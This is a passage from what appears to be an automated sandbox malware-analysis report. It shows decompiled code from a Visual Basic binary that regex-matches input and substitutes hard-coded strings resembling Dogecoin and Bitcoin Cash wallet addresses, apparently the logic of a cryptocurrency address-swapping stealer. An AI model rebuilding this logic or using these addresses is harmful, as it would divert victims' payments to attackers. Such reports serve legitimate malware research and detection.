									_push(L"DAzXcVkaHGgYPpdz8irFB2PcvtoLP87bs5");
								} else {
									_v112 = 0x4126a4;
									_push( &_v172);
									_t174 =  &_v120;
									_push(_t174);
									_v120 = 0x8008;
									L00401346();
									if(_t174 == 0) {
										_v112 = 0x4126b0;
										_push( &_v172);
										_t176 =  &_v120;
										_push(_t176);
										_v120 = 0x8008;
										L00401346();
										if(_t176 == 0) {
											_v112 = 0x4126bc;
											_push( &_v172);
											_t178 =  &_v120;
											_push(_t178);
											_v120 = 0x8008;
											L00401346();
											if(_t178 == 0) {
												_v112 = 0x4126c8;
												_push( &_v172);
												_t180 =  &_v120;
												_push(_t180);
												_v120 = 0x8008;
												L00401346();
												if(_t180 == 0) {
													_v112 = 0x4126d4;
													_push( &_v172);
													_t182 =  &_v120;
													_push(_t182);
													_v120 = 0x8008;
													L00401346();
													if(_t182 == 0) {
														_v112 = 0x4126e0;
														_push( &_v172);
														_t184 =  &_v120;
														_push(_t184);
														_v120 = 0x8008;
														L00401346();
														if(_t184 == 0) {
															_v112 = 0x4126ec;
															_push( &_v172);
															_t186 =  &_v120;
															_push(_t186);
															_v120 = 0x8008;
															L00401346();
															if(_t186 == 0) {
																_v112 = 0x4126f8;
																_push( &_v172);
																_t188 =  &_v120;
																_push(_t188);
																_v120 = 0x8008;
																L00401346();
																if(_t188 == 0) {
																	_v112 = 0x412704;
																	_push( &_v172);
																	_t190 =  &_v120;
																	_push(_t190);
																	_v120 = 0x8008;
																	L00401346();
																	if(_t190 == 0) {
																		_v112 = 0x412710;
																		_push( &_v172);
																		_t192 =  &_v120;
																		_push(_t192);
																		_v120 = 0x8008;
																		L00401346();
																		if(_t192 == 0) {
																			_v112 = 0x41271c;
																			_push( &_v172);
																			_t194 =  &_v120;
																			_push(_t194);
																			_v120 = 0x8008;
																			L00401346();
																			if(_t194 == 0) {
																				_v112 = 0x412728;
																				_push( &_v172);
																				_t196 =  &_v120;
																				_push(_t196);
																				_v120 = 0x8008;
																				L00401346();
																				if(_t196 == 0) {
																					goto L33;
																				} else {
																					_push(0);
																					_push(0xffffffff);
																					_push(_t223);
																					_push(L"DUKBGpgmBJCCrQqS3b5VpDVKCK8xvxKb2h");
																				}
																			} else {
																				_push(0);
																				_push(0xffffffff);
																				_push(_t223);
																				_push(L"DTbuVWrVPsUtj3C2eby86WRcybtD4GBtPA");
																			}
																		} else {
																			_push(0);
																			_push(0xffffffff);
																			_push(_t223);
																			_push(L"DSMKvqbsKgmBQECicFVsrEUyd3zHa5RSip");
																		}
																	} else {
																		_push(0);
																		_push(0xffffffff);
																		_push(_t223);
																		_push(L"DPQBHQggTDv19PChkWXRcxMRPahhPVCa8L");
																	}
																} else {
																	_push(0);
																	_push(0xffffffff);
																	_push(_t223);
																	_push(L"DNnSUpUEk34iuf4fKipqGRrDdx4gtnBAxC");
																}
															} else {
																_push(0);
																_push(0xffffffff);
																_push(_t223);
																_push(L"DLYtRmHKE83Dppm7gT7yxgx7n8NsLQACGx");
															}
														} else {
															_push(0);
															_push(0xffffffff);
															_push(_t223);
															_push(L"DKnnMt7v5FJkjs38c6zdbR5s6LuoMvLcmq");
														}
													} else {
														_push(0);
														_push(0xffffffff);
														_push(_t223);
														_push(L"DFp6KBk3do226tJbZ565k2R6iL29gHwyBg");
													}
												} else {
													_push(0);
													_push(0xffffffff);
													_push(_t223);
													_push(L"DExYSfngpBw6yGPrPuL7TxTrDxvPMbnKFm");
												}
											} else {
												_push(0);
												_push(0xffffffff);
												_push(_t223);
												_push(L"DDvCUpZMkKJZA26HkwhqTTEKxbyUZ3h3Fb");
											}
										} else {
											_push(0);
											_push(0xffffffff);
											_push(_t223);
											_push(L"DCVFpRb9XWZZuYD9f3PZwKUAL8Ho6ahagN");
										}
									} else {
										_push(0);
										_push(0xffffffff);
										_push(_t223);
										_push(L"DBH6uXwvHiepeRMCPDfWWpE63vVmCygE6c");
									}
								}
							} else {
								_push(0);
								_push(0xffffffff);
								_push(_t223);
								_push(L"D8onfxEYEcRGNna4jEpRVXdYFdMFFtCmu3");
							}
						} else {
							_push(0);
							_push(0xffffffff);
							_push(_t223);
							_push(L"D7FcMy6HGH5RdLcvB6TFXjT4m6BYN12uJo");
						}
					} else {
						_push(0);
						_push(0xffffffff);
						_push(_t223);
						_push(L"D6sJqG8JFDH8kmoWNJyKRfYt4chwWEGnu9");
					}
					_push( &_v68);
					_t165 =  &_v88;
					_push(_t165);
					L0040139A();
					_push(_t165);
					_push( *0x419028);
					L004013A0();
					L0040136A();
					L0040135E();
					 *0x419024 =  *0x419024 | 0x0000ffff;
					_push( &_v36);
					_push( &_v120);
					_push( &_v104);
					_v112 = _t223;
					_v120 = 2;
					L004013C4();
					L004013DC();
					_push( &_v68);
					_push( &_v156);
					_push( &_v180);
					_push( &_v184);
					_t152 =  &_v176;
					_push(_t152);
					L004013BE();
				}
				_push(0x416f80);
				_t153 =  &_v176;
				_push(_t153);
				L004013AC();
				L0040132E();
				L00401352();
				L00401352();
				L00401352();
				L00401352();
				L00401352();
				return _t153;
			}










































              0x00416a0b
              0x00416a16
              0x00416a17
              0x00416a27
              0x00416a2a
              0x00416a36
              0x00416a37
              0x00416a3c
              0x00416a3d
              0x00416a40
              0x00416a43
              0x00416a46
              0x00416a49
              0x00416a4c
              0x00416a4f
              0x00416a52
              0x00416a58
              0x00416a5e
              0x00416a64
              0x00416a6a
              0x00416a70
              0x00416a76
              0x00416a7e
              0x00416a82
              0x00416a83
              0x00416a91
              0x00416aa0
              0x00416aa1
              0x00416aa2
              0x00416aa3
              0x00416aa8
              0x00416aa9
              0x00416aaa
              0x00416aaf
              0x00416abb
              0x00416ac5
              0x00416ac6
              0x00416ac7
              0x00416ac8
              0x00416acd
              0x00416ace
              0x00416acf
              0x00416ad4
              0x00416ae0
              0x00416aea
              0x00416aeb
              0x00416aec
              0x00416aed
              0x00416af2
              0x00416af3
              0x00416af4
              0x00416aff
              0x00416b02
              0x00416b09
              0x00416b17
              0x00416b18
              0x00416b24
              0x00416b25
              0x00416b26
              0x00416b27
              0x00416b2d
              0x00416b2e
              0x00416b2f
              0x00416b34
              0x00416b35
              0x00416b38
              0x00416b39
              0x00416b41
              0x00416b45
              0x00416b46
              0x00416b4e
              0x00416b52
              0x00416b59
              0x00416b60
              0x00416b67
              0x00416b68
              0x00416b6e
              0x00416b6f
              0x00416b79
              0x00416b84
              0x00416b86
              0x00416b8a
              0x00416b8b
              0x00416b99
              0x00416ba4
              0x00416bab
              0x00416bac
              0x00416baf
              0x00416bb0
              0x00416bb7
              0x00416bbf
              0x00416bd5
              0x00416bdc
              0x00416bdd
              0x00416be0
              0x00416be1
              0x00416be8
              0x00416bf0
              0x00416c06
              0x00416c0d
              0x00416c0e
              0x00416c11
              0x00416c12
              0x00416c19
              0x00416c21
              0x00416c37
              0x00416c3e
              0x00416c3f
              0x00416c42
              0x00416c43
              0x00416c4a
              0x00416c52
              0x00416e9b
              0x00416e9b
              0x00416e9c
              0x00416e9e
              0x00416e9f
              0x00416c58
              0x00416c5e
              0x00416c65
              0x00416c66
              0x00416c69
              0x00416c6a
              0x00416c71
              0x00416c79
              0x00416c8f
              0x00416c96
              0x00416c97
              0x00416c9a
              0x00416c9b
              0x00416ca2
              0x00416caa
              0x00416cc0
              0x00416cc7
              0x00416cc8
              0x00416ccb
              0x00416ccc
              0x00416cd3
              0x00416cdb
              0x00416cf1
              0x00416cf8
              0x00416cf9
              0x00416cfc
              0x00416cfd
              0x00416d04
              0x00416d0c
              0x00416d22
              0x00416d29
              0x00416d2a
              0x00416d2d
              0x00416d2e
              0x00416d35
              0x00416d3d
              0x00416d53
              0x00416d5a
              0x00416d5b
              0x00416d5e
              0x00416d5f
              0x00416d66
              0x00416d6e
              0x00416d84
              0x00416d8b
              0x00416d8c
              0x00416d8f
              0x00416d90
              0x00416d97
              0x00416d9f
              0x00416db5
              0x00416dbc
              0x00416dbd
              0x00416dc0
              0x00416dc1
              0x00416dc8
              0x00416dd0
              0x00416de6
              0x00416ded
              0x00416dee
              0x00416df1
              0x00416df2
              0x00416df9
              0x00416e01
              0x00416e17
              0x00416e1e
              0x00416e1f
              0x00416e22
              0x00416e23
              0x00416e2a
              0x00416e32
              0x00416e45
              0x00416e4c
              0x00416e4d
              0x00416e50
              0x00416e51
              0x00416e58
              0x00416e60
              0x00416e73
              0x00416e7a
              0x00416e7b
              0x00416e7e
              0x00416e7f
              0x00416e86
              0x00416e8e
              0x00000000
              0x00416e90
              0x00416e90
              0x00416e91
              0x00416e93
              0x00416e94
              0x00416e94
              0x00416e62
              0x00416e62
              0x00416e63
              0x00416e65
              0x00416e66
              0x00416e66
              0x00416e34
              0x00416e34
              0x00416e35
              0x00416e37
              0x00416e38
              0x00416e38
              0x00416e03
              0x00416e03
              0x00416e04
              0x00416e06
              0x00416e07
              0x00416e07
              0x00416dd2
              0x00416dd2
              0x00416dd3
              0x00416dd5
              0x00416dd6
              0x00416dd6
              0x00416da1
              0x00416da1
              0x00416da2
              0x00416da4
              0x00416da5
              0x00416da5
              0x00416d70
              0x00416d70
              0x00416d71
              0x00416d73
              0x00416d74
              0x00416d74
              0x00416d3f
              0x00416d3f
              0x00416d40
              0x00416d42
              0x00416d43
              0x00416d43
              0x00416d0e
              0x00416d0e
              0x00416d0f
              0x00416d11
              0x00416d12
              0x00416d12
              0x00416cdd
              0x00416cdd
              0x00416cde
              0x00416ce0
              0x00416ce1
              0x00416ce1
              0x00416cac
              0x00416cac
              0x00416cad
              0x00416caf
              0x00416cb0
              0x00416cb0
              0x00416c7b
              0x00416c7b
              0x00416c7c
              0x00416c7e
              0x00416c7f
              0x00416c7f
              0x00416c79
              0x00416c23
              0x00416c23
              0x00416c24
              0x00416c26
              0x00416c27
              0x00416c27
              0x00416bf2
              0x00416bf2
              0x00416bf3
              0x00416bf5
              0x00416bf6
              0x00416bf6
              0x00416bc1
              0x00416bc1
              0x00416bc2
              0x00416bc4
              0x00416bc5
              0x00416bc5
              0x00416ea7
              0x00416ea8
              0x00416eab
              0x00416eac
              0x00416eb1
              0x00416eb2
              0x00416eb8
              0x00416ec1
              0x00416ec9
              0x00416ed1
              0x00416ed9
              0x00416edd
              0x00416ee1
              0x00416ee2
              0x00416ee5
              0x00416eec
              0x00416ef6
              0x00416efe
              0x00416f05
              0x00416f0c
              0x00416f13
              0x00416f14
              0x00416f1a
              0x00416f1b
              0x00416f1b
              0x00416f25
              0x00416f3d
              0x00416f43
              0x00416f44
              0x00416f4f
              0x00416f5a
              0x00416f62
              0x00416f6a
              0x00416f72
              0x00416f7a
              0x00416f7f

              APIs
              • #716.MSVBVM60(?,VBScript.RegExp,00000000,00004008,00000008,00419028), ref: 00416A76
              • __vbaVarSetVar.MSVBVM60(?,?,?,VBScript.RegExp,00000000,00004008,00000008,00419028), ref: 00416A83
              • __vbaVarVargNofree.MSVBVM60(?,?,?,VBScript.RegExp,00000000,00004008,00000008,00419028), ref: 00416A91
              • __vbaVarLateMemSt.MSVBVM60(?,Pattern,00000000,00004008,00000008,00419028), ref: 00416AAA
              • __vbaVarLateMemSt.MSVBVM60(?,IgnoreCase,?,?,?,?,?,?,00000008,00419028), ref: 00416ACF
              • __vbaVarLateMemSt.MSVBVM60(?,Global,?,?,?,?,?,?,?,?,?,?,00000008,00419028), ref: 00416AF4
              • __vbaVarMove.MSVBVM60(?,Global,?,?,?,?,?,?,?,?,?,?,00000008,00419028), ref: 00416B09
              • __vbaVargVar.MSVBVM60(?,?,Global,?,?,?,?,?,?,?,?,?,?,00000008,00419028), ref: 00416B18
              • __vbaVarLateMemCallLd.MSVBVM60(?,?,Execute,00000001), ref: 00416B39
              • __vbaVarSetVar.MSVBVM60(?,00000000), ref: 00416B46
              • __vbaForEachVar.MSVBVM60(?,?,?,?,?,?,?,00000000), ref: 00416B6F
              • #617.MSVBVM60(?,?,00000002,?,?,?,?,?,?,?,00000000), ref: 00416B8B
              • __vbaVarMove.MSVBVM60(?,?,00000002,?,?,?,?,?,?,?,00000000), ref: 00416B99
              • __vbaVarTstEq.MSVBVM60(00000002,?,?,?,00000002,?,?,?,?,?,?,?,00000000), ref: 00416BB7
              • __vbaVarTstEq.MSVBVM60(00008008,?,00000002,?,?,?,00000002,?,?,?,?,?,?,?,00000000), ref: 00416BE8
              • __vbaVarTstEq.MSVBVM60(00008008,?,00008008,?,00000002,?,?,?,00000002,?,?,?,?,?,?,?), ref: 00416C19
              • __vbaVarTstEq.MSVBVM60(00008008,?,00008008,?,00008008,?,00000002,?,?,?,00000002,?,?,?,?,?), ref: 00416C4A
              • __vbaVarTstEq.MSVBVM60(00008008,?,00008008,?,00008008,?,00008008,?,00000002,?,?,?,00000002,?,?,?), ref: 00416C71
              • __vbaStrVarVal.MSVBVM60(?,?,DAzXcVkaHGgYPpdz8irFB2PcvtoLP87bs5,00000001,000000FF,00000000,00008008,?,00008008,?,00008008,?,00000002,?,?,?), ref: 00416EAC
              • #712.MSVBVM60(00000000,?,?,DAzXcVkaHGgYPpdz8irFB2PcvtoLP87bs5,00000001,000000FF,00000000,00008008,?,00008008,?,00008008,?,00000002,?,?), ref: 00416EB8
              • __vbaStrMove.MSVBVM60(00000000,?,?,DAzXcVkaHGgYPpdz8irFB2PcvtoLP87bs5,00000001,000000FF,00000000,00008008,?,00008008,?,00008008,?,00000002,?,?), ref: 00416EC1
              • __vbaFreeStr.MSVBVM60(00000000,?,?,DAzXcVkaHGgYPpdz8irFB2PcvtoLP87bs5,00000001,000000FF,00000000,00008008,?,00008008,?,00008008,?,00000002,?,?), ref: 00416EC9
              • __vbaVarAdd.MSVBVM60(?,00008008,?,00000000,?,?,DAzXcVkaHGgYPpdz8irFB2PcvtoLP87bs5,00000001,000000FF,00000000,00008008,?,00008008,?,00008008,?), ref: 00416EEC
              • __vbaVarMove.MSVBVM60(?,00008008,?,00000000,?,?,DAzXcVkaHGgYPpdz8irFB2PcvtoLP87bs5,00000001,000000FF,00000000,00008008,?,00008008,?,00008008,?), ref: 00416EF6
              • __vbaNextEachVar.MSVBVM60(?,?,?,?,?,?,00008008,?,00000000,?,?,DAzXcVkaHGgYPpdz8irFB2PcvtoLP87bs5,00000001,000000FF,00000000,00008008), ref: 00416F1B
              • __vbaAryUnlock.MSVBVM60(?,00416F80,?,?,?,?,?,?,?,00000000), ref: 00416F44
              • __vbaFreeObj.MSVBVM60(?,00416F80,?,?,?,?,?,?,?,00000000), ref: 00416F4F
              • __vbaFreeVar.MSVBVM60(?,00416F80,?,?,?,?,?,?,?,00000000), ref: 00416F5A
              • __vbaFreeVar.MSVBVM60(?,00416F80,?,?,?,?,?,?,?,00000000), ref: 00416F62
              • __vbaFreeVar.MSVBVM60(?,00416F80,?,?,?,?,?,?,?,00000000), ref: 00416F6A
              • __vbaFreeVar.MSVBVM60(?,00416F80,?,?,?,?,?,?,?,00000000), ref: 00416F72
              • __vbaFreeVar.MSVBVM60(?,00416F80,?,?,?,?,?,?,?,00000000), ref: 00416F7A
              Strings
              • DCVFpRb9XWZZuYD9f3PZwKUAL8Ho6ahagN, xrefs: 00416CB0
              • DBH6uXwvHiepeRMCPDfWWpE63vVmCygE6c, xrefs: 00416C7F
              • DUKBGpgmBJCCrQqS3b5VpDVKCK8xvxKb2h, xrefs: 00416E94
              • D6sJqG8JFDH8kmoWNJyKRfYt4chwWEGnu9, xrefs: 00416BC5
              • DLYtRmHKE83Dppm7gT7yxgx7n8NsLQACGx, xrefs: 00416DA5
              • IgnoreCase, xrefs: 00416AC8
              • D7FcMy6HGH5RdLcvB6TFXjT4m6BYN12uJo, xrefs: 00416BF6
              • DPQBHQggTDv19PChkWXRcxMRPahhPVCa8L, xrefs: 00416E07
              • DAzXcVkaHGgYPpdz8irFB2PcvtoLP87bs5, xrefs: 00416E9F
              • DNnSUpUEk34iuf4fKipqGRrDdx4gtnBAxC, xrefs: 00416DD6
              • D8onfxEYEcRGNna4jEpRVXdYFdMFFtCmu3, xrefs: 00416C27
              • Pattern, xrefs: 00416AA3
              • DExYSfngpBw6yGPrPuL7TxTrDxvPMbnKFm, xrefs: 00416D12
              • Global, xrefs: 00416AED
              • DKnnMt7v5FJkjs38c6zdbR5s6LuoMvLcmq, xrefs: 00416D74
              • VBScript.RegExp, xrefs: 00416A37
              • Execute, xrefs: 00416B2F
              • DFp6KBk3do226tJbZ565k2R6iL29gHwyBg, xrefs: 00416D43
              • DSMKvqbsKgmBQECicFVsrEUyd3zHa5RSip, xrefs: 00416E38
              • DDvCUpZMkKJZA26HkwhqTTEKxbyUZ3h3Fb, xrefs: 00416CE1
              • DTbuVWrVPsUtj3C2eby86WRcybtD4GBtPA, xrefs: 00416E66
              Memory Dump Source
              • Source File: 00000000.00000002.699080451.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.699077488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.699098890.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.699104365.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Runtime Explorer.jbxd
              Yara matches
              Similarity
              • API ID: __vba$Free$LateMove$EachVarg$#617#712#716CallNextNofreeUnlock
              • String ID: D6sJqG8JFDH8kmoWNJyKRfYt4chwWEGnu9$D7FcMy6HGH5RdLcvB6TFXjT4m6BYN12uJo$D8onfxEYEcRGNna4jEpRVXdYFdMFFtCmu3$DAzXcVkaHGgYPpdz8irFB2PcvtoLP87bs5$DBH6uXwvHiepeRMCPDfWWpE63vVmCygE6c$DCVFpRb9XWZZuYD9f3PZwKUAL8Ho6ahagN$DDvCUpZMkKJZA26HkwhqTTEKxbyUZ3h3Fb$DExYSfngpBw6yGPrPuL7TxTrDxvPMbnKFm$DFp6KBk3do226tJbZ565k2R6iL29gHwyBg$DKnnMt7v5FJkjs38c6zdbR5s6LuoMvLcmq$DLYtRmHKE83Dppm7gT7yxgx7n8NsLQACGx$DNnSUpUEk34iuf4fKipqGRrDdx4gtnBAxC$DPQBHQggTDv19PChkWXRcxMRPahhPVCa8L$DSMKvqbsKgmBQECicFVsrEUyd3zHa5RSip$DTbuVWrVPsUtj3C2eby86WRcybtD4GBtPA$DUKBGpgmBJCCrQqS3b5VpDVKCK8xvxKb2h$Execute$Global$IgnoreCase$Pattern$VBScript.RegExp
              • API String ID: 3083996531-1940192035
              • Opcode ID: 3cea416903a9e41895a8d90d74ae57b65d2c9b94a58eb9f05c24e45c32734f65
              • Instruction ID: b6a0f0702147f5dfbe6ed0faf7a2fab26e30b85f1cb9588615b5d15cf349b7b8
              • Opcode Fuzzy Hash: 3cea416903a9e41895a8d90d74ae57b65d2c9b94a58eb9f05c24e45c32734f65
              • Instruction Fuzzy Hash: D0E14DB5800318AADF10EF96CD85EDEB7BCBF05314F60426BA419B31D1DB785A498F29
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              C-Code - Quality: 37%
              			E004166F9(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a4, void* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v36;
				char _v52;
				char _v68;
				char _v84;
				char _v88;
				char _v104;
				signed int _v112;
				char _v120;
				signed int _v136;
				char _v156;
				char _v172;
				char _v176;
				char _v180;
				char _v184;
				char _v208;
				char* _t93;
				char* _t100;
				char* _t101;
				char* _t105;
				char* _t107;
				char* _t116;
				char* _t118;
				signed int _t145;
				intOrPtr _t154;

				_push(0x401256);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t154;
				_v12 = _t154 - 0xbc;
				_v8 = 0x401218;
				_push(0);
				_push(L"VBScript.RegExp");
				_push( &_v104);
				_v36 = 0;
				_v52 = 0;
				_v68 = 0;
				_v84 = 0;
				_v88 = 0;
				_v104 = 0;
				_v120 = 0;
				_v136 = 0;
				_v156 = 0;
				_v172 = 0;
				_v176 = 0;
				_v180 = 0;
				_v184 = 0;
				L004012F2();
				_push( &_v104);
				_push( &_v52);
				L004013EE();
				L004013E2();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"Pattern");
				_push( &_v52);
				asm("movsd");
				L004013E8();
				_v112 = _v112 | 0xffffffff;
				_v120 = 0xb;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"IgnoreCase");
				_push( &_v52);
				asm("movsd");
				L004013E8();
				_v112 = _v112 | 0xffffffff;
				_v120 = 0xb;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"Global");
				_push( &_v52);
				asm("movsd");
				L004013E8();
				_v112 = 0;
				_v120 = 2;
				L004013DC();
				_push( &_v208);
				L004013D0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t145 = 1;
				_push(_t145);
				_push(L"Execute");
				_push( &_v52);
				_t93 =  &_v104;
				_push(_t93);
				L004013D6();
				_push(_t93);
				_push( &_v84);
				L004013EE();
				_push( &_v84);
				_push( &_v68);
				_push( &_v156);
				_push( &_v180);
				_push( &_v184);
				_t100 =  &_v176;
				_push(_t100);
				L004013CA();
				while(_t100 != 0) {
					_push(2);
					_push( &_v68);
					_push( &_v104);
					L004013A6();
					L004013DC();
					_v112 = 0x412650;
					_push( &_v172);
					_t105 =  &_v120;
					_push(_t105);
					_v120 = 0x8008;
					L00401346();
					if(_t105 != 0) {
						L7:
						_push(0);
						_push(0xffffffff);
						_push(_t145);
						_push(L"qp0e0fdtxzgklu4um995qux0w5wep4mjwgcflz246z");
					} else {
						_v112 = 0x41265c;
						_push( &_v172);
						_t116 =  &_v120;
						_push(_t116);
						_v120 = 0x8008;
						L00401346();
						if(_t116 == 0) {
							_v112 = 0x412668;
							_push( &_v172);
							_t118 =  &_v120;
							_push(_t118);
							_v120 = 0x8008;
							L00401346();
							if(_t118 == 0) {
								goto L7;
							} else {
								_push(0);
								_push(0xffffffff);
								_push(_t145);
								_push(L"qzatfelqp8ymsjchwwv57ckultvjsytwv5608qncdk");
							}
						} else {
							_push(0);
							_push(0xffffffff);
							_push(_t145);
							_push(L"qq75exaak2c70jxh3pjf7ll82x33a8gk0udetm5x6n");
						}
					}
					_push( &_v68);
					_t107 =  &_v88;
					_push(_t107);
					L0040139A();
					_push(_t107);
					_push( *0x419028);
					L004013A0();
					L0040136A();
					L0040135E();
					 *0x419024 =  *0x419024 | 0x0000ffff;
					_push( &_v36);
					_push( &_v120);
					_push( &_v104);
					_v112 = _t145;
					_v120 = 2;
					L004013C4();
					L004013DC();
					_push( &_v68);
					_push( &_v156);
					_push( &_v180);
					_push( &_v184);
					_t100 =  &_v176;
					_push(_t100);
					L004013BE();
				}
				_push(0x4169f5);
				_t101 =  &_v176;
				_push(_t101);
				L004013AC();
				L0040132E();
				L00401352();
				L00401352();
				L00401352();
				L00401352();
				L00401352();
				return _t101;
			}





























              0x004166fe
              0x00416709
              0x0041670a
              0x0041671a
              0x0041671d
              0x00416729
              0x0041672a
              0x0041672f
              0x00416730
              0x00416733
              0x00416736
              0x00416739
              0x0041673c
              0x0041673f
              0x00416742
              0x00416745
              0x0041674b
              0x00416751
              0x00416757
              0x0041675d
              0x00416763
              0x00416769
              0x00416771
              0x00416775
              0x00416776
              0x00416784
              0x00416793
              0x00416794
              0x00416795
              0x00416796
              0x0041679b
              0x0041679c
              0x0041679d
              0x004167a2
              0x004167ae
              0x004167b8
              0x004167b9
              0x004167ba
              0x004167bb
              0x004167c0
              0x004167c1
              0x004167c2
              0x004167c7
              0x004167d3
              0x004167dd
              0x004167de
              0x004167df
              0x004167e0
              0x004167e5
              0x004167e6
              0x004167e7
              0x004167f2
              0x004167f5
              0x004167fc
              0x0041680a
              0x0041680b
              0x00416817
              0x00416818
              0x00416819
              0x0041681a
              0x00416820
              0x00416821
              0x00416822
              0x00416827
              0x00416828
              0x0041682b
              0x0041682c
              0x00416834
              0x00416838
              0x00416839
              0x00416841
              0x00416845
              0x0041684c
              0x00416853
              0x0041685a
              0x0041685b
              0x00416861
              0x00416862
              0x0041686c
              0x00416877
              0x00416879
              0x0041687d
              0x0041687e
              0x0041688c
              0x00416897
              0x0041689e
              0x0041689f
              0x004168a2
              0x004168a3
              0x004168aa
              0x004168b2
              0x00416910
              0x00416910
              0x00416911
              0x00416913
              0x00416914
              0x004168b4
              0x004168ba
              0x004168c1
              0x004168c2
              0x004168c5
              0x004168c6
              0x004168cd
              0x004168d5
              0x004168e8
              0x004168ef
              0x004168f0
              0x004168f3
              0x004168f4
              0x004168fb
              0x00416903
              0x00000000
              0x00416905
              0x00416905
              0x00416906
              0x00416908
              0x00416909
              0x00416909
              0x004168d7
              0x004168d7
              0x004168d8
              0x004168da
              0x004168db
              0x004168db
              0x004168d5
              0x0041691c
              0x0041691d
              0x00416920
              0x00416921
              0x00416926
              0x00416927
              0x0041692d
              0x00416936
              0x0041693e
              0x00416946
              0x0041694e
              0x00416952
              0x00416956
              0x00416957
              0x0041695a
              0x00416961
              0x0041696b
              0x00416973
              0x0041697a
              0x00416981
              0x00416988
              0x00416989
              0x0041698f
              0x00416990
              0x00416990
              0x0041699a
              0x004169b2
              0x004169b8
              0x004169b9
              0x004169c4
              0x004169cf
              0x004169d7
              0x004169df
              0x004169e7
              0x004169ef
              0x004169f4

              APIs
              • #716.MSVBVM60(?,VBScript.RegExp,00000000,00004008,00000008,00419028), ref: 00416769
              • __vbaVarSetVar.MSVBVM60(?,?,?,VBScript.RegExp,00000000,00004008,00000008,00419028), ref: 00416776
              • __vbaVarVargNofree.MSVBVM60(?,?,?,VBScript.RegExp,00000000,00004008,00000008,00419028), ref: 00416784
              • __vbaVarLateMemSt.MSVBVM60(?,Pattern,00000000,00004008,00000008,00419028), ref: 0041679D
              • __vbaVarLateMemSt.MSVBVM60(?,IgnoreCase,?,?,?,?,?,?,00000008,00419028), ref: 004167C2
              • __vbaVarLateMemSt.MSVBVM60(?,Global,?,?,?,?,?,?,?,?,?,?,00000008,00419028), ref: 004167E7
              • __vbaVarMove.MSVBVM60(?,Global,?,?,?,?,?,?,?,?,?,?,00000008,00419028), ref: 004167FC
              • __vbaVargVar.MSVBVM60(?,?,Global,?,?,?,?,?,?,?,?,?,?,00000008,00419028), ref: 0041680B
              • __vbaVarLateMemCallLd.MSVBVM60(?,?,Execute,00000001), ref: 0041682C
              • __vbaVarSetVar.MSVBVM60(?,00000000), ref: 00416839
              • __vbaForEachVar.MSVBVM60(?,?,?,?,?,?,?,00000000), ref: 00416862
              • #617.MSVBVM60(?,?,00000002,?,?,?,?,?,?,?,00000000), ref: 0041687E
              • __vbaVarMove.MSVBVM60(?,?,00000002,?,?,?,?,?,?,?,00000000), ref: 0041688C
              • __vbaVarTstEq.MSVBVM60(00000002,?,?,?,00000002,?,?,?,?,?,?,?,00000000), ref: 004168AA
              • __vbaVarTstEq.MSVBVM60(00008008,?,00000002,?,?,?,00000002,?,?,?,?,?,?,00008008,?,00000000), ref: 004168CD
              • __vbaVarTstEq.MSVBVM60(00008008,?,00008008,?,00000002,?,?,?,00000002,?,?,?,?,?,?,00008008), ref: 004168FB
              • __vbaStrVarVal.MSVBVM60(?,?,qp0e0fdtxzgklu4um995qux0w5wep4mjwgcflz246z,00000001,000000FF,00000000,00000002,?,?,?,00000002,?,?,?,?,?), ref: 00416921
              • #712.MSVBVM60(00000000,?,?,qp0e0fdtxzgklu4um995qux0w5wep4mjwgcflz246z,00000001,000000FF,00000000,00000002,?,?,?,00000002,?,?,?,?), ref: 0041692D
              • __vbaStrMove.MSVBVM60(00000000,?,?,qp0e0fdtxzgklu4um995qux0w5wep4mjwgcflz246z,00000001,000000FF,00000000,00000002,?,?,?,00000002,?,?,?,?), ref: 00416936
              • __vbaFreeStr.MSVBVM60(00000000,?,?,qp0e0fdtxzgklu4um995qux0w5wep4mjwgcflz246z,00000001,000000FF,00000000,00000002,?,?,?,00000002,?,?,?,?), ref: 0041693E
              • __vbaVarAdd.MSVBVM60(?,00008008,?,00000000,?,?,qp0e0fdtxzgklu4um995qux0w5wep4mjwgcflz246z,00000001,000000FF,00000000,00000002,?,?,?,00000002,?), ref: 00416961
              • __vbaVarMove.MSVBVM60(?,00008008,?,00000000,?,?,qp0e0fdtxzgklu4um995qux0w5wep4mjwgcflz246z,00000001,000000FF,00000000,00000002,?,?,?,00000002,?), ref: 0041696B
              • __vbaNextEachVar.MSVBVM60(?,?,?,?,?,?,00008008,?,00000000,?,?,qp0e0fdtxzgklu4um995qux0w5wep4mjwgcflz246z,00000001,000000FF,00000000,00000002), ref: 00416990
              • __vbaAryUnlock.MSVBVM60(?,004169F5,?,?,?,?,?,?,?,00000000), ref: 004169B9
              • __vbaFreeObj.MSVBVM60(?,004169F5,?,?,?,?,?,?,?,00000000), ref: 004169C4
              • __vbaFreeVar.MSVBVM60(?,004169F5,?,?,?,?,?,?,?,00000000), ref: 004169CF
              • __vbaFreeVar.MSVBVM60(?,004169F5,?,?,?,?,?,?,?,00000000), ref: 004169D7
              • __vbaFreeVar.MSVBVM60(?,004169F5,?,?,?,?,?,?,?,00000000), ref: 004169DF
              • __vbaFreeVar.MSVBVM60(?,004169F5,?,?,?,?,?,?,?,00000000), ref: 004169E7
              • __vbaFreeVar.MSVBVM60(?,004169F5,?,?,?,?,?,?,?,00000000), ref: 004169EF
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.699080451.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.699077488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.699098890.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
